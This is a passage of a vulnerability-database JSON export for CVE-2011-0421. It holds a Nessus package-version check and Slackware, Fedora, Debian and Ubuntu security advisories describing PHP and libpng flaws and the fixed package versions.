script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"php5\", reference:\"5.2.6.dfsg.1-1+lenny12\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php-pear\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-cgi\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-cli\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-common\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-curl\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dbg\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-dev\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-enchant\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-gd\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-gmp\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-imap\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-interbase\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-intl\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-ldap\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mcrypt\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-mysql\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-odbc\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pgsql\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-pspell\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-recode\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-snmp\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sqlite\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-sybase\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-tidy\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xmlrpc\", reference:\"5.3.3-7+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"php5-xsl\", reference:\"5.3.3-7+squeeze3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2020-10-25T16:35:54", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0421", "CVE-2011-0421"], "description": "New libpng packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, 11.0, 12.0, 12.1, 12.2, 13.0, 13.1, 13.37, and -current\nto fix security issues.\n\n\nHere are the details from the Slackware 13.37 ChangeLog:\n\npatches/packages/libpng-1.4.8-i486-1_slack13.37.txz: Upgraded.\n Fixed uninitialized memory read in png_format_buffer()\n (Bug report by Frank Busse, related to CVE-2004-0421).\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0421\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/libpng-1.2.46-i386-1_slack8.1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/libpng-1.2.46-i386-1_slack9.0.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/libpng-1.2.46-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/libpng-1.2.46-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/libpng-1.2.46-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/libpng-1.2.46-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/libpng-1.2.46-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/libpng-1.2.46-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/libpng-1.2.46-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/libpng-1.2.46-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/libpng-1.2.46-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/libpng-1.2.46-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/libpng-1.4.8-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/libpng-1.4.8-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/libpng-1.4.8-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/libpng-1.4.8-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libpng-1.4.8-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libpng-1.4.8-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\nad0f8dc2b0b9269c342a0d61bd007c5e libpng-1.2.46-i386-1_slack8.1.tgz\n\nSlackware 9.0 package:\n365bea389c02fdc3b920b36b1f5f5a4d libpng-1.2.46-i386-1_slack9.0.tgz\n\nSlackware 9.1 package:\nb96cf4fb882decd82bba233b615df3ba libpng-1.2.46-i486-1_slack9.1.tgz\n\nSlackware 10.0 package:\n64b11f971f7379ed0af5dc766daf2dd4 libpng-1.2.46-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\n13927173b5ecc4a33a0290363e4e53cd libpng-1.2.46-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\nb32cb1ee9694579a42e47128323b0412 libpng-1.2.46-i486-1_slack10.2.tgz\n\nSlackware 11.0 package:\nbc0efc812d8b1a52bb5c480a5b2f9200 libpng-1.2.46-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\nc4fb87f7ecf7aebcd380765d25d0f751 libpng-1.2.46-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n8f1d8ec6a325c95725b3740dbd41c311 libpng-1.2.46-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\nc846762291145276057dad5c58bb2f89 libpng-1.2.46-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\ne0bc86aa7eeed92f8f8734efa0b54483 libpng-1.2.46-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n3d2a8eb7474420519c947f666635ece8 libpng-1.2.46-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n406d411805cf2f99c567c97f53bce69b libpng-1.4.8-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n972fb84c00c4a0d7ab9134f6e65c657f libpng-1.4.8-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\na323c2d1ff04054ec8423710200c7682 libpng-1.4.8-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\na56d0776e600625505cc12e6853c50cc libpng-1.4.8-x86_64-1_slack13.37.txz\n\nSlackware -current package:\nebf0f61c96738b840afa104e6ed3a71f libpng-1.4.8-i486-1.txz\n\nSlackware x86_64 -current package:\nc3ea775b59fde83c9e65a1d9648945c9 libpng-1.4.8-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg libpng-1.4.8-i486-1_slack13.37.txz", "modified": "2011-07-29T23:18:23", "published": "2011-07-29T23:18:23", "id": "SSA-2011-210-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2011&m=slackware-security.617466", "type": "slackware", "title": "[slackware-security] libpng", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-0708", "CVE-2011-1092", "CVE-2011-1153"], "description": "eAccelerator is a further development of the MMCache PHP Accelerator & Enco der. It increases performance of PHP scripts by caching them in compiled state, so that the overhead of compiling is almost completely eliminated. ", "modified": "2011-03-25T07:02:02", "published": "2011-03-25T07:02:02", "id": "FEDORA:5BFF4110F9B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: php-eaccelerator-0.9.6.1-6.fc15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-0708", "CVE-2011-1092", "CVE-2011-1153"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. ", "modified": "2011-03-25T07:02:02", "published": "2011-03-25T07:02:02", "id": "FEDORA:5FE0A110FDE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: maniadrive-1.2-29.fc15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-0708", "CVE-2011-1092", "CVE-2011-1153"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2011-03-25T07:02:02", "published": "2011-03-25T07:02:02", "id": "FEDORA:57E68110E3B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: php-5.3.6-1.fc15", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-0708", "CVE-2011-1092", "CVE-2011-1153"], "description": "eAccelerator is a further development of the MMCache PHP Accelerator & Enco der. It increases performance of PHP scripts by caching them in compiled state, so that the overhead of compiling is almost completely eliminated. ", "modified": "2011-04-06T22:34:24", "published": "2011-04-06T22:34:24", "id": "FEDORA:92E21111A84", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: php-eaccelerator-0.9.6.1-6.fc13", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-0708", "CVE-2011-1092", "CVE-2011-1153"], "description": "eAccelerator is a further development of the MMCache PHP Accelerator & Enco der. It increases performance of PHP scripts by caching them in compiled state, so that the overhead of compiling is almost completely eliminated. ", "modified": "2011-04-06T22:33:56", "published": "2011-04-06T22:33:56", "id": "FEDORA:CD55C111A26", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: php-eaccelerator-0.9.6.1-6.fc14", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-0708", "CVE-2011-1092", "CVE-2011-1153"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2011-04-06T22:34:24", "published": "2011-04-06T22:34:24", "id": "FEDORA:8A8DC1119DF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: php-5.3.6-1.fc13", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-0708", "CVE-2011-1092", "CVE-2011-1153"], "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module which adds support for the PHP language to Apache HTTP Server. ", "modified": "2011-04-06T22:33:56", "published": "2011-04-06T22:33:56", "id": "FEDORA:C705211199E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: php-5.3.6-1.fc14", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-0708", "CVE-2011-1092", "CVE-2011-1153"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. ", "modified": "2011-04-06T22:34:24", "published": "2011-04-06T22:34:24", "id": "FEDORA:8F60E111A68", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 13 Update: maniadrive-1.2-27.fc13", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-0708", "CVE-2011-1092", "CVE-2011-1153"], "description": "ManiaDrive is an arcade car game on acrobatic tracks, with a quick and nerv ous gameplay (tracks almost never exceed one minute). Features: Complex car physics, Challenging \"story mode\", LAN and Internet mode, Live scores, Track editor, Dedicated server with HTTP interface and More than 30 blocks. ", "modified": "2011-04-06T22:33:56", "published": "2011-04-06T22:33:56", "id": "FEDORA:D0393111A65", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 14 Update: maniadrive-1.2-27.fc14", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2020-11-11T13:15:58", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-1153", "CVE-2011-1471", "CVE-2011-1466", "CVE-2010-2531", "CVE-2011-0708", "CVE-2011-0420", "CVE-2011-2202"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2266-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJune 29, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2010-2531 CVE-2011-0420 CVE-2011-0421 CVE-2011-0708 \n CVE-2011-1153 CVE-2011-1466 CVE-2011-1471 CVE-2011-2202 \n\nSeveral vulnerabilities were discovered in PHP, which could lead to \ndenial of service or potentially the execution of arbitrary code.\n\nCVE-2010-2531\n\n An information leak was found in the var_export() function.\n\nCVE-2011-0421\n\n The Zip module could crash.\n\nCVE-2011-0708\n\n An integer overflow was discovered in the Exif module.\n\nCVE-2011-1466\n\n An integer overflow was discovered in the Calendar module.\n\nCVE-2011-1471\n\n The Zip module was prone to denial of service through malformed\n archives.\n\nCVE-2011-2202\n\n Path names in form based file uploads (RFC 1867) were incorrectly \n validated.\n\nThis update also fixes two bugs, which are not treated as security\nissues, but fixed nonetheless, see README.Debian.security for details\non the scope of security support for PHP (CVE-2011-0420, CVE-2011-1153).\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 5.2.6.dfsg.1-1+lenny12.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 5.3.3-7+squeeze3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 5.3.6-12.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2011-06-29T18:57:08", "published": "2011-06-29T18:57:08", "id": "DEBIAN:DSA-2266-1:4FAC3", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00137.html", "title": "[SECURITY] [DSA 2266-1] php5 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-11T13:19:49", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-1153", "CVE-2011-1471", "CVE-2011-1466", "CVE-2010-2531", "CVE-2011-0708", "CVE-2011-0420", "CVE-2011-2202"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2266-2 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 01, 2011 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2010-2531 CVE-2011-0420 CVE-2011-0421 CVE-2011-0708 \n CVE-2011-1153 CVE-2011-1466 CVE-2011-1471 CVE-2011-2202 \n\nThe update for CVE-2010-2531 for the old stabledistribution (lenny)\nintroduced a regression, which lead to additional output being written\nto stdout. \n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 5.2.6.dfsg.1-1+lenny13.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2011-07-01T20:15:08", "published": "2011-07-01T20:15:08", "id": "DEBIAN:DSA-2262-2:2E683", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2011/msg00140.html", "title": "[SECURITY] [DSA 2262-2] php5 update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-08T23:37:33", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-0441", "CVE-2011-1471", "CVE-2011-1148", "CVE-2011-1466", "CVE-2010-4697", "CVE-2011-1092", "CVE-2011-1144", "CVE-2010-4698", "CVE-2006-7243", "CVE-2011-0708", "CVE-2011-1468", "CVE-2011-0420", "CVE-2011-1470", "CVE-2011-1469", "CVE-2011-1464", "CVE-2011-1072"], "description": "Stephane Chazelas discovered that the /etc/cron.d/php5 cron job for \nPHP 5.3.5 allows local users to delete arbitrary files via a symlink \nattack on a directory under /var/lib/php5/. (CVE-2011-0441)\n\nRaphael Geisert and Dan Rosenberg discovered that the PEAR installer \nallows local users to overwrite arbitrary files via a symlink attack on \nthe package.xml file, related to the (1) download_dir, (2) cache_dir, \n(3) tmp_dir, and (4) pear-build-download directories. (CVE-2011-1072, \nCVE-2011-1144)\n\nBen Schmidt discovered that a use-after-free vulnerability in the PHP \nZend engine could allow an attacker to cause a denial of service (heap \nmemory corruption) or possibly execute arbitrary code. (CVE-2010-4697)\n\nMartin Barbella discovered a buffer overflow in the PHP GD extension \nthat allows an attacker to cause a denial of service (application crash) \nvia a large number of anti- aliasing steps in an argument to the \nimagepstext function. (CVE-2010-4698)\n\nIt was discovered that PHP accepts the \\0 character in a pathname, \nwhich might allow an attacker to bypass intended access restrictions \nby placing a safe file extension after this character. This issue \nis addressed in Ubuntu 10.04 LTS, Ubuntu 10.10, and Ubuntu 11.04. \n(CVE-2006-7243)\n\nMaksymilian Arciemowicz discovered that the grapheme_extract function \nin the PHP Internationalization extension (Intl) for ICU allow \nan attacker to cause a denial of service (crash) via an invalid \nsize argument, which triggers a NULL pointer dereference. This \nissue affected Ubuntu 10.04 LTS, Ubuntu 10.10, and Ubuntu \n11.04. (CVE-2011-0420)\n\nMaksymilian Arciemowicz discovered that the _zip_name_locate \nfunction in the PHP Zip extension does not properly handle a \nZIPARCHIVE::FL_UNCHANGED argument, which might allow an attacker to \ncause a denial of service (NULL pointer dereference) via an empty \nZIP archive. This issue affected Ubuntu 8.04 LTS, Ubuntu 9.10, Ubuntu \n10.04 LTS, Ubuntu 10.10, and Ubuntu 11.04. (CVE-2011-0421)\n\nLuca Carettoni discovered that the PHP Exif extension performs an \nincorrect cast on 64bit platforms, which allows a remote attacker \nto cause a denial of service (application crash) via an image with \na crafted Image File Directory (IFD). (CVE-2011-0708)\n\nJose Carlos Norte discovered that an integer overflow in the PHP \nshmop extension could allow an attacker to cause a denial of service \n(crash) and possibly read sensitive memory function. (CVE-2011-1092)\n\nFelipe Pena discovered that a use-after-free vulnerability in the \nsubstr_replace function allows an attacker to cause a denial of \nservice (memory corruption) or possibly execute arbitrary code. \n(CVE-2011-1148)\n\nFelipe Pena discovered multiple format string vulnerabilities in the \nPHP phar extension. These could allow an attacker to obtain sensitive \ninformation from process memory, cause a denial of service (memory \ncorruption), or possibly execute arbitrary code. This issue affected \nUbuntu 10.04 LTS, Ubuntu 10.10, and Ubuntu 11.04.(CVE-2011-1153)\n\nIt was discovered that a buffer overflow occurs in the strval function \nwhen the precision configuration option has a large value. The default \ncompiler options for Ubuntu 8.04 LTS, Ubuntu 9.10, Ubuntu 10.04 LTS, \nUbuntu 10.10, and Ubuntu 11.04 should reduce the vulnerability to a \ndenial of service. (CVE-2011-1464)\n\nIt was discovered that an integer overflow in the SdnToJulian function \nin the PHP Calendar extension could allow an attacker to cause a \ndenial of service (application crash). (CVE-2011-1466)\n\nTomas Hoger discovered that an integer overflow in the \nNumberFormatter::setSymbol function in the PHP Intl extension \ncould allow an attacker to cause a denial of service (application \ncrash). This issue affected Ubuntu 10.04 LTS, Ubuntu 10.10, and Ubuntu \n11.04. (CVE-2011-1467)\n\nIt was discovered that multiple memory leaks in the PHP OpenSSL \nextension might allow a remote attacker to cause a denial of service \n(memory consumption). This issue affected Ubuntu 10.04 LTS, Ubuntu \n10.10, and Ubuntu 11.04. (CVE-2011-1468)\n\nDaniel Buschke discovered that the PHP Streams component in PHP \nhandled types improperly, possibly allowing an attacker to cause a \ndenial of service (application crash). (CVE-2011-1469)\n\nIt was discovered that the PHP Zip extension could allow an attacker to \ncause a denial of service (application crash) via a ziparchive stream \nthat is not properly handled by the stream_get_contents function. This \nissue affected Ubuntu 8.04 LTS, Ubuntu 9.10, Ubuntu 10.04 LTS, Ubuntu \n10.10, and Ubuntu 11.04. (CVE-2011-1470)\n\nIt was discovered that an integer signedness error in the PHP Zip \nextension could allow an attacker to cause a denial of service (CPU \nconsumption) via a malformed archive file. This issue affected \nUbuntu 8.04 LTS, Ubuntu 9.10, Ubuntu 10.04 LTS, Ubuntu 10.10, and \nUbuntu 11.04. (CVE-2011-1470) (CVE-2011-1471)", "edition": 5, "modified": "2011-04-29T00:00:00", "published": "2011-04-29T00:00:00", "id": "USN-1126-1", "href": "https://ubuntu.com/security/notices/USN-1126-1", "title": "PHP vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-08T23:37:11", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0421", "CVE-2011-1467", "CVE-2011-1153", "CVE-2011-0441", "CVE-2011-1471", "CVE-2011-1148", "CVE-2011-1466", "CVE-2010-4697", "CVE-2011-1092", "CVE-2011-1144", "CVE-2010-4698", "CVE-2006-7243", "CVE-2011-0708", "CVE-2011-1468", "CVE-2011-0420", "CVE-2011-1470", "CVE-2011-1469", "CVE-2011-1464", "CVE-2011-1072"], "description": "USN 1126-1 fixed several vulnerabilities in PHP. The fix for \nCVE-2010-4697 introduced an incorrect reference counting regression \nin the Zend engine that caused the PHP interpreter to segfault. This \nregression affects Ubuntu 6.06 LTS and Ubuntu 8.04 LTS.\n\nThe fixes for CVE-2011-1072 and CVE-2011-1144 introduced a regression \nin the PEAR installer that prevented it from creating its cache \ndirectory and reporting errors correctly.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nStephane Chazelas discovered that the /etc/cron.d/php5 cron job for \nPHP 5.3.5 allows local users to delete arbitrary files via a symlink \nattack on a directory under /var/lib/php5/. (CVE-2011-0441)\n\nRaphael Geisert and Dan Rosenberg discovered that the PEAR installer \nallows local users to overwrite arbitrary files via a symlink attack on \nthe package.xml file, related to the (1) download_dir, (2) cache_dir, \n(3) tmp_dir, and (4) pear-build-download directories. (CVE-2011-1072, \nCVE-2011-1144)\n\nBen Schmidt discovered that a use-after-free vulnerability in the PHP \nZend engine could allow an attacker to cause a denial of service (heap \nmemory corruption) or possibly execute arbitrary code. (CVE-2010-4697)\n\nMartin Barbella discovered a buffer overflow in the PHP GD extension \nthat allows an attacker to cause a denial of service (application crash) \nvia a large number of anti- aliasing steps in an argument to the \nimagepstext function. (CVE-2010-4698)\n\nIt was discovered that PHP accepts the \\0 character in a pathname, \nwhich might allow an attacker to bypass intended access restrictions \nby placing a safe file extension after this character. This issue \nis addressed in Ubuntu 10.04 LTS, Ubuntu 10.10, and Ubuntu 11.04. \n(CVE-2006-7243)\n\nMaksymilian Arciemowicz discovered that the grapheme_extract function \nin the PHP Internationalization extension (Intl) for ICU allow \nan attacker to cause a denial of service (crash) via an invalid \nsize argument, which triggers a NULL pointer dereference. This \nissue affected Ubuntu 10.04 LTS, Ubuntu 10.10, and Ubuntu \n11.04. (CVE-2011-0420)\n\nMaksymilian Arciemowicz discovered that the _zip_name_locate \nfunction in the PHP Zip extension does not properly handle a \nZIPARCHIVE::FL_UNCHANGED argument, which might allow an attacker to \ncause a denial of service (NULL pointer dereference) via an empty \nZIP archive. This issue affected Ubuntu 8.04 LTS, Ubuntu 9.10, Ubuntu \n10.04 LTS, Ubuntu 10.10, and Ubuntu 11.04. (CVE-2011-0421)\n\nLuca Carettoni discovered that the PHP Exif extension performs an \nincorrect cast on 64bit platforms, which allows a remote attacker \nto cause a denial of service (application crash) via an image with \na crafted Image File Directory (IFD). (CVE-2011-0708)\n\nJose Carlos Norte discovered that an integer overflow in the PHP \nshmop extension could allow an attacker to cause a denial of service \n(crash) and possibly read sensitive memory function. (CVE-2011-1092)\n\nFelipe Pena discovered that a use-after-free vulnerability in the \nsubstr_replace function allows an attacker to cause a denial of \nservice (memory corruption) or possibly execute arbitrary code. \n(CVE-2011-1148)\n\nFelipe Pena discovered multiple format string vulnerabilities in the \nPHP phar extension. These could allow an attacker to obtain sensitive \ninformation from process memory, cause a denial of service (memory \ncorruption), or possibly execute arbitrary code. This issue affected \nUbuntu 10.04 LTS, Ubuntu 10.10, and Ubuntu 11.04.(CVE-2011-1153)\n\nIt was discovered that a buffer overflow occurs in the strval function \nwhen the precision configuration option has a large value. The default \ncompiler options 